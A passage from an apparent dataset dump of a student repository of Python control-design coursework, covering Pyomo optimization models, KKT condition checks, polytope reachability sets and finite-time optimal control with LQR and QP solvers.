pyo.SolverFactory('ipopt').solve(m)\n return check_solver_status(m,res)\n\n# print(LPQPd())\n\ndef NLP1(z0 = []):\n m = pyo.ConcreteModel()\n m.z1 = pyo.Var(initialize = z0[0])\n m.z2 = pyo.Var(initialize = z0[1])\n m.obj = pyo.Objective(\n expr = 3*pyo.sin(-2*np.pi*m.z1) + 2*m.z1 +4+ pyo.cos(2*np.pi*m.z2)+ m.z2\n )\n\n m.cons1 = pyo.Constraint(expr = (-1,m.z1,1))\n m.cons2 = pyo.Constraint(expr = (-1,m.z2,1))\n res = pyo.SolverFactory('ipopt').solve(m)\n\n return [m.z1(),m.z2(),m.obj()]\n\n# print(NLP1())\n\nz1 = []\nz2 = []\nJ = []\nfor _ in range(0):\n z1_init = np.random.uniform(-1,1)\n z2_init = np.random.uniform(-1,1)\n z1Opt,z2Opt,JOpt = NLP1([z1_init,z2_init])\n\n z1.append(z1Opt)\n z2.append(z2Opt)\n J.append(JOpt)\n\n# print('z1Opt = ',z1)\n# print('z2Opt = ',z2)\n# print('JOpt = ',J)\n\nz1_opt = z1\nz2_opt = z2\n\nimport matplotlib.pyplot as plt \n\nif False:\n fig,ax = plt.subplots(figsize = (15,15))\n z = np.linspace(-1,1,100)\n z1_grid,z2_grid = np.meshgrid(z,z)\n C = 3* np.sin(-2* np.pi * z1_grid) + 2*z1_grid + 4+ np.cos(2* np.pi* z2_grid) + z2_grid\n contour = plt.contour(\n z1_grid,z2_grid,C,\n cmap=plt.cm.RdBu,\n vmin = abs(C).min(),vmax = abs(C).max(),\n )\n ax.clabel(contour,fontsize = 10,inline=1)\n ax.axis('square')\n ax.scatter(z1_opt,z2_opt,c ='b')\n plt.show()\n\nif False:\n from mpl_toolkits.mplot3d import Axes3D\n fig = plt.figure(figsize=(12,9))\n ax = Axes3D(fig)\n z = np.linspace(-1,1,100)\n z1_grid,z2_grid = np.meshgrid(z,z)\n C = 3* np.sin(-2* np.pi * z1_grid) + 2*z1_grid + 4+ np.cos(2* np.pi* z2_grid) + z2_grid\n ax.plot_surface(z1_grid,z2_grid,C,rstride=1,cstride =1,cmap='viridis')\n ax.set_xlabel('z1')\n ax.set_ylabel('z2')\n ax.set_zlabel('cost')\n plt.show()\n\n# %% P3 NLP II\n\ndef NLP2(z0 = []):\n m = pyo.ConcreteModel()\n m.z1 = pyo.Var(initialize = z0[0])\n m.z2 = pyo.Var(initialize = z0[1])\n m.obj = pyo.Objective(\n expr = pyo.log(1+m.z1**2) - m.z2\n )\n m.cons1 = pyo.Constraint(\n expr = -(1+m.z1**2)**2 + m.z2**2 ==4\n )\n res = pyo.SolverFactory('ipopt').solve(m)\n\n return [m.z1(),m.z2(),m.obj()]\n\n# print(NLP2([0,0]))\nz1 = []\nz2 = []\nJ = []\nfor _ in range(0):\n z1_init = np.random.uniform(-1,1)\n # z2_init = np.random.uniform(-1,1)\n # -----------pay attention to z2_init here---------\n z2_init = np.sqrt( 4+ (1+z1_init**2)**2)\n z1Opt,z2Opt,JOpt = NLP2([z1_init,z2_init])\n\n z1.append(z1Opt)\n z2.append(z2Opt)\n J.append(JOpt)\n# print('z1Opt = ',z1)\n# print('z2Opt = ',z2)\n# print('JOpt = ',J)\n\nif False:\n fig,ax = plt.subplots(figsize = (15,15))\n z =np.linspace(-10,10,100)\n z1_grid, z2_grid = np.meshgrid(z,z)\n C = np.log(1 + z1_grid**2) - z2_grid\n CS = ax.contour(\n z1_grid,z2_grid,C,\n cmap = plt.cm.RdBu,\n vmin = abs(C).min(),vmax = abs(C).max()\n )\n ax.clabel(CS,fontsize=12,inline=1)\n ax.axis('square')\n plt.show()\n\nfrom mpl_toolkits.mplot3d import Axes3D\n\nif False:\n fig = plt.figure(figsize=(12,9))\n ax = Axes3D(fig)\n z = np.linspace(-10,10,100)\n z1_grid,z2_grid = np.meshgrid(z,z)\n C = np.log(1 + z1_grid**2) - z2_grid\n ax.plot_surface(z1_grid,z2_grid,C,rstride=1,cstride =1,cmap='viridis')\n ax.set_xlabel('z1')\n ax.set_ylabel('z2')\n ax.set_zlabel('cost')\n plt.show()\n\n\n# %% mixed integer problems \ndef MIPa():\n m = pyo.ConcreteModel()\n m.z1 = pyo.Var(within =pyo.Integers)\n m.z2 = pyo.Var(within =pyo.Integers)\n\n m.obj = pyo.Objective(\n expr = -6*m.z1 -5*m.z2\n )\n\n m.cons1 = pyo.Constraint(expr = 1* m.z1 + 4*m.z2 <=16)\n m.cons2 = pyo.Constraint(expr = 6* m.z1 + 4*m.z2 <=28)\n m.cons3 = pyo.Constraint(expr = 2* m.z1 - 5*m.z2 <=6)\n m.cons4 = pyo.Constraint(expr = (0,m.z1,10))\n m.cons5 = pyo.Constraint(expr = (0,m.z2,10))\n\n res = pyo.SolverFactory('glpk').solve(m)\n return [m.z1(),m.z2(),m.obj()]\n\n# print(MIPa())\n\ndef MIPb():\n m = pyo.ConcreteModel()\n m.z1 = pyo.Var()\n m.z2 = pyo.Var()\n m.bin = pyo.Var(within = pyo.Binary)\n m.obj = pyo.Objective(expr = -m.z1-2*m.z2)\n\n m.cons1 = pyo.Constraint(expr = 3*m.z1 + 4*m.z2 <=12+m.bin*1e8)\n m.cons2 = pyo.Constraint(expr = 4*m.z1 + 3*m.z2 <=12+(1-m.bin)*1e8)\n # -----------pay attention to the trick here------------------------\n m.c2 = pyo.Constraint(expr = m.z1>=0)\n m.c3 = pyo.Constraint(expr = m.z2>=0)\n res = pyo.SolverFactory('glpk').solve(m)\n return [m.z1(),m.z2(),m.obj()]\n\n# print(MIPb())\n\n# %% KKT conditions\nfrom pyomo.opt import SolverStatus,TerminationCondition\n\ndef LPQPkkta():\n KKTsat = False\n Threshold = 1e-5\n\n m = pyo.ConcreteModel()\n m.z1 = pyo.Var()\n m.z2 = pyo.Var()\n m.obj = pyo.Objective(expr = m.z1**2 + m.z2**2)\n m.c1 = pyo.Constraint(expr = m.z1 <=-3)\n m.c2 = pyo.Constraint(expr = m.z2 <=4)\n m.c3 = pyo.Constraint(expr = 4*m.z1 + 3*m.z2 <=0)\n \n\n m.dual = pyo.Suffix(direction = pyo.Suffix.IMPORT)\n\n res = pyo.SolverFactory('ipopt').solve(m)\n if res.solver.termination_condition is not TerminationCondition.optimal:\n KKTsat = False\n else:\n zOpt = np.array([m.z1(),m.z2()])\n A = np.array([1,0,0,1,4,3]).reshape((3,2))\n b = np.array([-3,4,0])\n # ---------------------don't reshape here ---------------------\n\n u = []\n for c in m.component_objects(pyo.Constraint,active = True):\n print (\"Constraint\", c)\n for index in c:\n print(m.dual[c[index]])\n u.append(m.dual[c[index]])\n\n u = np.asarray(u)\n \n for i in range(len(u)):\n if u[i] < Threshold and u[i] > -Threshold:\n u[i] =0\n\n x = A @ zOpt - b\n flag_ineq = np.any(np.all(x <= Threshold) or np.all(x <= -Threshold))\n # flag_ineq = np.any(np.all(A @ zOpt <= b + Threshold) or np.all(A@zOpt <= b -Threshold))\n flag_dual = np.all(u>=0)\n # flag_cs = np.all(np.multiply(u,x) < Threshold and np.all(np.multiply(u,x) > -Threshold))\n flag_cs = np.all(np.multiply(u,x)< Threshold) and np.all(np.multiply(u,x)> -Threshold)\n # ------------------- pay attention here ---------------------\n\n grad_lagrangian = [2*zOpt[0],2*zOpt[1]] + u.T @A\n for i, y in enumerate(grad_lagrangian):\n if y < Threshold and y > -Threshold:\n grad_lagrangian[i] = 0\n\n flag_grad = np.all(grad_lagrangian ==0)\n flags = [flag_ineq,flag_dual,flag_cs,flag_grad]\n flags = np.array(flags)\n if all(flags ==1):\n KKTsat = True\n else:\n KKTsat = False \n\n return KKTsat \n\n# print(LPQPkkta())\n\ndef NPLkkt(z0):\n KKTsat = True\n Threshold = 1e-5\n m = pyo.ConcreteModel()\n m.z1 = pyo.Var(initialize = z0[0])\n m.z2 = pyo.Var(initialize = z0[1])\n m.obj = pyo.Objective(\n expr = 3*pyo.sin(-2*np.pi*m.z1) + 2*m.z1+4+pyo.cos(2*np.pi*m.z2) + m.z2\n )\n # m.c1 = pyo.Constraint(expr = (-1,m.z1,1))\n # m.c2 = pyo.Constraint(expr = (-1,m.z2,1))\n # ------------------this constraint should only be expressed like this--------------------\n m.c11 = pyo.Constraint(expr = m.z1 <=1)\n m.c12 = pyo.Constraint(expr = -m.z1 <=1)\n m.c21 = pyo.Constraint(expr = m.z2 <=1)\n m.c22 = pyo.Constraint(expr = -m.z2 <=1)\n\n\n m.dual = pyo.Suffix(direction = pyo.Suffix.IMPORT)\n\n res = pyo.SolverFactory('ipopt').solve(m)\n zOpt = [m.z1(),m.z2()]\n\n if res.solver.termination_condition is not TerminationCondition.optimal:\n return False \n\n # A = np.array([1,0,-1,0,0,1,0,-1]).reshape((4,2))\n A = np.array([[1,0],[-1,0],[0,1],[0,-1]])\n b = np.array([1,1,1,1])\n\n u = []\n for c in m.component_objects(pyo.Constraint,active = True):\n for i in c:\n u.append(m.dual[c[i]])\n\n for i,ui in enumerate(u):\n if ui < Threshold and ui> -Threshold:\n u[i] = 0\n\n u = np.asarray(u)\n\n x = A @ zOpt -b \n flag_ineq = np.all(x <= Threshold)\n flag_dual = np.all(u >= 0)\n flag_cs = np.all(np.multiply(u,x)<Threshold) and np.all(np.multiply(u,x)>-Threshold)\n grad_lagrangian = [ -6*np.pi * np.cos(-2*np.pi*zOpt[0]) +2,-2*np.pi*np.sin(2*np.pi*zOpt[1])+1] + u.T @A\n\n for i, y in enumerate(grad_lagrangian):\n if y < Threshold and y > -Threshold:\n grad_lagrangian[i] = 0\n\n flag_grad = np.all(grad_lagrangian ==0)\n flags = [flag_ineq,flag_dual,flag_cs,flag_grad]\n flags = np.array(flags)\n if all(flags ==1):\n KKTsat = True\n else:\n KKTsat = False \n\n return KKTsat\n\nprint(NPLkkt([0,0]))\n\n\n\n "
},
{
"alpha_fraction": 0.41119980812072754,
"alphanum_fraction": 0.449987530708313,
"avg_line_length": 24.125391006469727,
"blob_id": "ec5db524eeeeabd800e3e7b99c469890948996c0",
"content_id": "b0120a055b86d340b810d09bf43f3a6bd1392fef",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 8018,
"license_type": "no_license",
"max_line_length": 127,
"num_lines": 319,
"path": "/py_files/reachability_class.py",
"repo_name": "ZionDeng/Advanced-Control-Design",
"src_encoding": "UTF-8",
"text": "import polytope as pt\nimport numpy as np\nimport cvxpy as cp\nimport matplotlib.pyplot as plt\n\nA = np.array([[1, 0],\n [0, 1],\n [0, -1],\n [-1, 0]])\n\nb = np.array([[10],\n [10],\n [10],\n [10]])\n\nP = pt.Polytope(A,b)\nif False:\n fig, ax = plt.subplots(1,1)\n plt.rcParams['figure.figsize'] = [20, 20]\n P.plot(ax, color='r')\n ax.autoscale_view()\n ax.axis('equal')\n plt.show()\n\n# reduce \nP = pt.reduce(P)\nprint(P)\n\n# HV conversion \nV=np.array([[10,10],[-10,10],[10,-10],[-10,-10]])\nP = pt.qhull(V)\nprint(P)\n\nV1 = pt.extreme(P)\nprint(V1)\n\n\n# Minkwoski sum of two Polytopes\ndef minkowski_sum(X,Y):\n v_sum = []\n if isinstance(X,pt.Polytope):\n X = pt.extreme(X) # make sure it is V version\n\n if isinstance(Y,pt.Polytope):\n Y = pt.extreme(Y)\n \n for i in range(X.shape[0]):\n for j in range(Y.shape[0]):\n v_sum.append(X[i,:]+Y[j,:])\n return pt.qhull(np.asarray(v_sum))\n\n\nP = np.array([[1, 0],\n [0, 1],\n [0, -1],\n [-1, 0]])\n\np = np.array([[6],\n [6],\n [6],\n [6]])\n\nQ = np.array([[1, 0],\n [0, 1],\n [0, -1],\n [-1, 0]])\n\nq = np.array([[2],\n [2],\n [2],\n [2]])\n\nPp = pt.Polytope(P, p)\nQq = pt.Polytope(Q, q)\n\np_sum = minkowski_sum(Pp, Qq)\n\nif False:\n fig, ax = plt.subplots(1,1)\n p_sum.plot(ax, color='b')\n Pp.plot(ax, color='r')\n Qq.plot(ax, color='g')\n ax.legend(['sum', 'P', 'Q'])\n ax.autoscale_view() \n ax.axis('equal')\n plt.show()\n\ndef projection(X,nx):\n V_sum = []\n V = pt.extreme(X)\n for i in range(V.shape[0]):\n V_sum.append(V[i,0:nx])\n return pt.qhull(np.asarray(V_sum))\n\nP = np.array([[1, 0, 0],\n [0, 1, 0 ],\n [0, -1, 0 ],\n [-1, 0, 0],\n [0,0,1],\n [0,0,-1]])\n\np = np.array([[6],\n [3],\n [3],\n [6],\n [10],\n [10]])\n\nPp = pt.Polytope(P, p)\n\nPProj = projection(Pp,2)\n# print(PProj)\n\n# %% N steps controllable sets to a given set \n\ndef precursor(Sset,A,Uset = pt.Polytope(),B = np.array([])):\n # see definition of Pre(S) in slides\n if not B.any(): # if B is nothing\n return pt.Polytope(Sset.A @ A ,Sset.b)\n else:\n tmp = minkowski_sum(Sset,pt.extreme(Uset) @ -B.T)\n return pt.Polytope(tmp.A @ A, tmp.b)\n\n# Example one step \nA = np.array([[1.5, 0],\n [1.0, -1.5]])\n\nB = np.array([[1.0], \n [0.0]])\n\nS = pt.Polytope(np.array([[1.0, 0], \n [0, 1.0],\n [-1, 0],\n [0, -1]]), \n np.array([[1], \n [1],\n [1],\n [1]]))\n\nU = pt.Polytope(np.array([[1.0], \n [-1.0]]),\n np.array([[5.0], \n [5.0]]))\nif False:\n preS = precursor(S, A, U, B)\n fig, ax = plt.subplots()\n S.plot(ax, color='b')\n #preS.intersect(S).plot(ax, color='r')\n preS.plot(ax, color='r')\n ax.legend(['S', 'Pre(S)'])\n plt.rcParams['figure.figsize'] = [10, 10]\n ax.autoscale_view()\n ax.axis('equal')\n plt.show()\n\n# example in 10 steps \n# Example 10 steps \n\n\nN = 10 # number of steps\nK = {}\nPreS = precursor(S, A, U, B) #one step controllable to S\nfor j in range(N):\n K[j]= PreS #for j=0 one ste controllable\n PreS = precursor(K[j], A, U, B)\n\n\n# Plotting \nplt.clf()\nplt.cla()\nplt.close('all')\nif False:\n fig = plt.figure()\n ax = fig.add_subplot(1, 1, 1)\n S.plot(ax, color='b')\n K[0].plot(ax, color='g', alpha=0.1, linestyle='solid', linewidth=1, edgecolor=None) # K_0 is equivalent to Pre S\n K[1].plot(ax, color='r', alpha=0.1, linestyle='solid', linewidth=1) # K_1 two step controllable set \n K[2].plot(ax, color='r', alpha=0.1, linestyle='solid', linewidth=1) # K_2 three step controllable set \n K[3].plot(ax, color='r', alpha=0.1, linestyle='solid', linewidth=1) # K_3 \n K[4].plot(ax, color='r', alpha=0.1, linestyle='solid', linewidth=1) # K_4 \n K[N-1].plot(ax, color='b', alpha=0.1, linestyle='solid', linewidth=1) # K_5 \n ax.legend(['K0', 'K1', 'K2', 'K3', 'K4', 'KN-1'])\n\n plt.rcParams['figure.figsize'] = [10, 10]\n ax.autoscale_view()\n ax.axis('equal')\n plt.show()\n\n\nK=np.array([[-0.1,-0.1]])\nAcl=A+B@K # x+=Ax+Bu but u=K*x-? x+=(A+BK)x\neig_val = np.linalg.eigvals(Acl)\nprint('Eigen Values are',eig_val,', if they are <0: ', np.all(eig_val<0))\n\nS = pt.Polytope(np.array([[1.0, 0], \n [0, 1.0],\n [-1, 0],\n [0, -1]]), \n np.array([[1], \n [1],\n [1],\n [1]]))\n\n# Input Constraints Hu*u<=Ku (umin=-5, umax=5)\nHu=np.array([[1.0],[-1.0]])\nku=np.array([[5.0], [5.0]])\n# recall U = pt.Polytope(Hu,ku)\n\n# if u has to be in U then Kx has to be in U -> (Hu*K)*x<=ku\n# U now become X constraints\nX = pt.Polytope(Hu@K,ku)\nSnew=S.intersect(X)\npreS = precursor(Snew, Acl)\n\nif False:\n fig, ax = plt.subplots()\n Snew.plot(ax, color='b')\n # X.plot(ax, color='g') unbounded X \n #preS.intersect(S).plot(ax, color='r')\n preS.plot(ax, color='r')\n ax.legend(['S', 'Pre(S)','X'])\n plt.rcParams['figure.figsize'] = [5, 5]\n ax.autoscale_view()\n ax.axis('equal')\n plt.title('Closed S')\n plt.show()\n\ndef max_pos_inv(A, S):\n maxIterations = 500\n # initialization\n Omega_i = S \n for i in range(maxIterations):\n # compute backward reachable set\n P = precursor(Omega_i, A)\n # intersect with the state constraints\n P = pt.reduce(P).intersect(Omega_i)\n if P == Omega_i:\n Oinf = Omega_i\n break\n else:\n Omega_i = P\n if i == maxIterations:\n converged = 0\n else:\n converged = 1\n return Oinf, converged\n\ndef max_cntr_inv(A,B,X,U):\n maxIterations = 500\n # initialization\n Omega0 = X \n for i in range(maxIterations):\n # compute backward reachable set\n P = precursor(Omega0, A, U, B)\n # intersect with the state constraints\n P = pt.reduce(P).intersect(Omega0)\n if P == Omega0:\n Cinf = Omega0\n break\n else:\n Omega0 = P\n if i == maxIterations:\n converged = 0\n else:\n converged = 1\n return Cinf, converged\n\n\nA = np.array([[0.5, 0],\n [1.0, -0.5]])\n\nX = pt.Polytope(np.array([[1.0, 0], \n [0, 1.0],\n [-1, 0],\n [0, -1]]), \n np.array([[10.0], \n [10.0],\n [10.0],\n [10.0]]))\n\nOinf, converged = max_pos_inv(A,S)\n\nif False:\n fig, ax = plt.subplots()\n Oinf.plot(ax, color='g', alpha=0.5, linestyle='solid', linewidth=1, edgecolor=None)\n ax.autoscale_view()\n ax.axis('equal')\n plt.show()\n\n# Example 10.6 (Figure 10.8) MPC book\n\nA = np.array([[1.5, 0],\n [1.0, -1.5]])\n\nB = np.array([[1.0], \n [0.0]])\nX = pt.Polytope(np.array([[1.0, 0], \n [0, 1.0],\n [-1, 0],\n [0, -1]]), \n np.array([[10.0], \n [10.0],\n [10.0],\n [10.0]]))\n\nU = pt.Polytope(np.array([[1.0], \n [-1.0]]),\n np.array([[5.0], \n [5.0]]))\n\nCinfset, converged = max_cntr_inv(A, B, X, U)\nif False:\n fig, ax = plt.subplots()\n X.plot(ax, color='b')\n Cinfset.plot(ax, color='r')\n ax.legend(['X', 'C_inf'])\n ax.autoscale_view()\n ax.axis('equal')\n plt.show() "
},
{
"alpha_fraction": 0.5045597553253174,
"alphanum_fraction": 0.5455148220062256,
"avg_line_length": 22.01526641845703,
"blob_id": "337f1c605bf1be838447904849d0c9324ef03fc0",
"content_id": "751dbae00cc11c327fff66d4f874b692ba4937f9",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 6031,
"license_type": "no_license",
"max_line_length": 115,
"num_lines": 262,
"path": "/py_files/HW4_FTOC.py",
"repo_name": "ZionDeng/Advanced-Control-Design",
"src_encoding": "UTF-8",
"text": "# Finite Time Optimal Control \n\n# %% vehicle \n\nimport matplotlib.pyplot as plt \nimport numpy as np \nimport pyomo.environ as pyo \n\nTs = .2 \nN = 70\nTFinal = Ts * N\n\nz0Bar = np.array([0,3,0,0])\nzNBar = np.array([0,0,0,-np.pi/2])\nzMax = np.array([20,10,10,2*np.pi])\nzMin = np.array([-20,-.2,-10,-2*np.pi])\numin = [-0.3,-0.6]\numax = [0.3,0.6]\n\nnz = 4\nnu = 2 \nl_r = 1.738 \n\nm = pyo.ConcreteModel()\nm.tidx = pyo.Set(initialize = range(N+1))\nm.zidx = pyo.Set(initialize = range(nz))\nm.uidx = pyo.Set(initialize = range(nu))\n\nm.z = pyo.Var(m.zidx,m.tidx)\nm.u = pyo.Var(m.uidx,m.tidx)\n\nm.cost = pyo.Objective(\n expr = sum((m.z[i,t] - zNBar[i])**2 for i in m.zidx for t in m.tidx \n if t > N-3 and t<N+1),\n sense = pyo.minimize\n)\n\nm.c11 = pyo.Constraint(\n m.tidx, rule = lambda m,t:\n m.z[0,t+1] == m.z[0,t] + Ts * (m.z[2,t]* pyo.cos(m.z[3,t]+m.u[1,t]))\n if t < N else pyo.Constraint.Skip\n)\nm.c12 = pyo.Constraint(\n m.tidx, rule = lambda m,t:\n m.z[1,t+1] == m.z[1,t] + Ts * (pyo.sin(m.z[3,t]+m.u[1,t]))\n if t < N else pyo.Constraint.Skip\n)\nm.c13 = pyo.Constraint(\n m.tidx, rule = lambda m,t:\n m.z[2,t+1] == m.z[2,t] +Ts* m.u[0,t]\n if t < N else pyo.Constraint.Skip\n) \nm.c14 = pyo.Constraint(\n m.tidx, rule = lambda m,t:\n m.z[3,t+1] == m.z[3,t] + Ts * (m.z[2,t]/l_r * pyo.sin(m.u[1,t]))\n if t < N else pyo.Constraint.Skip\n)\n# zmin <= zk <= zmax \nm.c21 = pyo.Constraint(\n m.zidx,m.tidx, rule = lambda m,i,t:\n m.z[i,t] <= zMax[i]\n if t< N else pyo.Constraint.Skip\n)\nm.c22 = pyo.Constraint(\n m.zidx,m.tidx, rule = lambda m,i,t:\n m.z[i,t] >= zMin[i]\n if t< N else pyo.Constraint.Skip\n)\n# umin <= uk <= umax\nm.c31 = pyo.Constraint(\n m.uidx, m.tidx, rule = lambda m,i,t:\n m.u[i,t] <= umax[i]\n if t <N else pyo.Constraint.Skip\n)\nm.c32 = pyo.Constraint(\n m.uidx, m.tidx, rule = lambda m,i,t:\n m.u[i,t] >= umin[i]\n if t <N else pyo.Constraint.Skip\n)\n# |beta_k+1 - beta_k| <= beta_d\nm.c41 = pyo.Constraint(\n m.tidx, rule = lambda m,t:\n m.u[1,t+1] - m.u[1,t] <= 0.2 \n if t < N-1 else pyo.Constraint.Skip\n)\nm.c41 = pyo.Constraint(\n m.tidx, rule = lambda m,t:\n m.u[1,t+1] - m.u[1,t] >= -0.2 \n if t < N-1 else pyo.Constraint.Skip\n)\n\nm.c5 = pyo.Constraint(\n m.zidx, rule = lambda m,i:\n m.z[i,0] == z0Bar[i]\n)\nm.c6 = pyo.Constraint(\n m.zidx, rule = lambda m,i:\n m.z[i,N] == zNBar[i]\n)\n\n# results = pyo.SolverFactory('ipopt').solve(m).write()\n\n\nimport numpy as np \nfrom scipy.linalg import block_diag\nfrom numpy.linalg import inv \n\ndef Sx_Su(A,B,N):\n\n nX = np.size(A,0)\n nU = np.size(B,1)\n Sx = np.eye(nX)\n\n A_tmp = A\n for i in range(N):\n Sx = np.vstack((Sx,A_tmp))\n A_tmp = A_tmp @ A \n\n SxB = Sx @ B \n Su = np.zeros((nX*(N+1),nU * N))\n for j in range(N):\n Su_tmp = np.vstack((np.zeros((nX,nU)),SxB[:-nX,:]))\n Su[:,j] = Su_tmp.reshape(Su_tmp.shape[0],)\n SxB = Su_tmp\n \n return Sx, Su \n\ndef lqrBatch(A,B,Q,R,PN,N):\n Sx, Su = Sx_Su(A,B,N)\n Qbar = block_diag(np.kron(np.eye(N),Q),PN)\n Rbar = np.kron(np.eye(N),R)\n QSu = Qbar @ Su\n H = Su.T @ QSu + Rbar\n F = Sx.T @ QSu\n K = -inv(H) @ F.T \n P0 = F@K + Sx.T @ Qbar @ Sx\n\n return K,P0\n\nA = np.array([.77, -0.35, 0.49, 0.91]).reshape((2,2))\nB = np.array([0.04,0.15]).reshape((2,1))\nQ = np.diag([500,100])\nR = 1 \nPN = np.diag([1500,100])\nx0 = np.array([1,-1]).T\nN = 5\n\nK,P0 = lqrBatch(A,B,Q,R,PN,N)\nU0_star = K @ x0\nJ0_star = x0.T @ P0 @ x0\n\n# print('u0* = ',U0_star)\n# print('J0* = ',J0_star)\n\n\nQbar = block_diag(np.kron(np.eye(N),Q),PN)\nRbar = np.kron(np.eye(N),R)\nSx, Su = Sx_Su(A,B,N)\nQSu = Qbar @ Su\nH = Su.T @ QSu +Rbar\nF = Sx.T @ QSu\n\nP = 2*H \nq = 2 * x0.T @ F \n\nimport cvxopt\n\nP = cvxopt.matrix(P,tc= 'd')\nq = cvxopt.matrix(q,tc= 'd')\nsol = cvxopt.solvers.qp(P,q)\n# print('u* = ', sol['x'])\n# print('J* = ', sol['primal objective'] + x0.T @ Sx.T @ Qbar @ Sx @ x0)\n\n\n# %% unconstrained linear finite time optimal control \n\nnx = np.size(A,0)\nnu = np.size(B,1)\n\nP = np.zeros((nx,nx,N+1))\nF = np.zeros((nu,nx,N))\n# ----------------pay attention to size here----------------\n\nfor i in range(N-1,-1,-1):\n # F[:,:,-1] = - inv(B.T @P[:,:,i+1] @B + R)@B.T @P[:,:,i+1] @ A \n P_k1 = P[:,:,i+1]\n F[:,:,i] = -inv(B.T @ P_k1 @ B +R) @ B.T @ P_k1 @ A\n P[:,:,i] = A.T @ P_k1 @A + Q +A.T @P_k1 @B@ F[:,:,i]\n\nJopt_DP = x0.T @ P[:,:,0] @ x0\n# print('opt cost from recursive approach: ',Jopt_DP)\n\ndef sysSim(A,B,D,w,xCurr,uCurr):\n x_next = A @ xCurr + B* uCurr + D * w \n return x_next\n\nD = np.array([[.1],[.1]])\nw = np.random.normal(0,10,N)\n# print(N)\n\nx_batch = [x0.reshape((2,1))]\nx_recursive = [x0.reshape((2,1))]\n\nfor i in range(N):\n x_batch.append(sysSim(A,B,D,w[i],x_batch[0],U0_star[i]))\n x_recursive.append(sysSim(A,B,D,w[i],x_recursive[i],F[:,:,i] @ x_recursive[i]))\n\nt_grid = np.arange(N+1)\n\nx_batch = np.array(x_batch)\nx_recursive = np.array(x_recursive)\n\nif False:\n plt.plot(t_grid,x_batch[:,0],x_recursive[:,0])\n plt.legend(['state 1 batch','state 1 dyn'],loc = 'best')\n plt.show()\n\n# %% Constrained finite time optimal control \nAx = np.array([1,1,0,1]).reshape((2,2))\nBx = np.array([0,1]).reshape((2,1))\nQ = np.eye(2)\nP = np.eye(2)\nR = 0.1 \nN = 3 \nx0 = np.array([-1,-1]).reshape((2,1))\n\nULlim = -1\nUUlim = 1\nxLlim = [-15,-15]\nxUlim = [15,15]\n\nQbar = block_diag(np.kron(np.eye(N),Q),P)\nRbar = np.kron(np.eye(N),R)\nSx, Su = Sx_Su(A,B,N)\nQSu = Qbar @ Su\nH = Su.T @ QSu +Rbar\nF = Sx.T @ QSu\nK = -inv(H) @F.T\nP0 = F@K + Sx.T @ Qbar @ Sx\nnX = 2 \n\nA = np.concatenate([np.kron(np.array([[1],[-1]]),np.eye(3)), Su, -Su], axis = 0)\nb = np.concatenate([np.ones((nX*N,1)), 15*np.ones((2*nX*(N+1),1))-np.concatenate([Sx,-Sx], axis = 0)@x0], axis = 0)\n\nc = x0.T @ Sx.T @ Qbar @ Sx @ x0\n\nP = 2*H \nq = 2 * x0.T @ F \n\nP = cvxopt.matrix(P, tc='d')\nq = cvxopt.matrix(q.T, tc='d')\nG = cvxopt.matrix(A, tc='d')\nh = cvxopt.matrix(b, tc='d')\n\nfrom ttictoc import tic,toc \n\ntic()\nsol = cvxopt.solvers.qp(P,q,G,h)\nt_dense = toc()\n\nJopt_dense = sol['primal objective'] + c \nprint('opt cost= ', Jopt_dense)\n\n"
},
{
"alpha_fraction": 0.5353440046310425,
"alphanum_fraction": 0.5645617246627808,
"avg_line_length": 19,
"blob_id": "0f8ef0e735fe9edcb8ab9dd597ee7bcfbf2fc110",
"content_id": "059e53f0bae3a4c6fc9e843a7ea97a2c8a626448",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1061,
"license_type": "no_license",
"max_line_length": 53,
"num_lines": 53,
"path": "/midterm_exam/C1.py",
"repo_name": "ZionDeng/Advanced-Control-Design",
"src_encoding": "UTF-8",
"text": "\nimport matplotlib.pyplot as plt\nimport numpy as np \nimport pyomo.environ as pyo\n\nN = 50\nxNbar = 1\nx0 =0 \nm = pyo.ConcreteModel()\nm.tidx = pyo.Set(initialize = range(N+1))\nm.u = pyo.Var(m.tidx)\nm.x = pyo.Var(m.tidx)\n\nm.cost = pyo.Objective(\n expr = sum((m.x[t]-xNbar) ** 2 for t in m.tidx),\n sense= pyo.minimize \n \n)\n\nm.c1 = pyo.Constraint(\n m.tidx, rule = lambda m,t:\n m.x[t+1] == pyo.sin(m.x[t]) + m.u[t]\n if t < N else pyo.Constraint.Skip\n)\nm.c21 = pyo.Constraint(\n m.tidx, rule = lambda m,t:\n m.u[t] <= -0.2\n if t<N else pyo.Constraint.Skip\n)\nm.c22 = pyo.Constraint(\n m.tidx, rule = lambda m,t:\n m.u[t] >= 0.2\n if t<N else pyo.Constraint.Skip\n)\nm.c31 = pyo.Constraint(\n expr = m.x[N] -xNbar <= -0.1\n)\nm.c32 = pyo.Constraint(\n expr = m.x[N] -xNbar >= 0.1\n)\nm.c4 = pyo.Constraint(expr = m.x[0] == x0)\n\nresults = pyo.SolverFactory('ipopt').solve(m).write()\n\nx= [m.x[0]()]\nu= [m.u[0]()]\nfor t in m.tidx:\n if t< N: \n x.append(m.x[t]())\n \n if t< N-1:\n u.append(m.u[t]())\nplt.plot(x)\nplt.show()\n"
},
{
"alpha_fraction": 0.5690531134605408,
"alphanum_fraction": 0.5884526371955872,
"avg_line_length": 28.2702693939209,
"blob_id": "eb31c54aade2579520cc83b51e0b91182f706ac9",
"content_id": "f8057486dda4b998b7fac0578da22789b53c2dfa",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 2165,
"license_type": "no_license",
"max_line_length": 111,
"num_lines": 74,
"path": "/py_files/Lab4_KKT.py",
"repo_name": "ZionDeng/Advanced-Control-Design",
"src_encoding": "UTF-8",
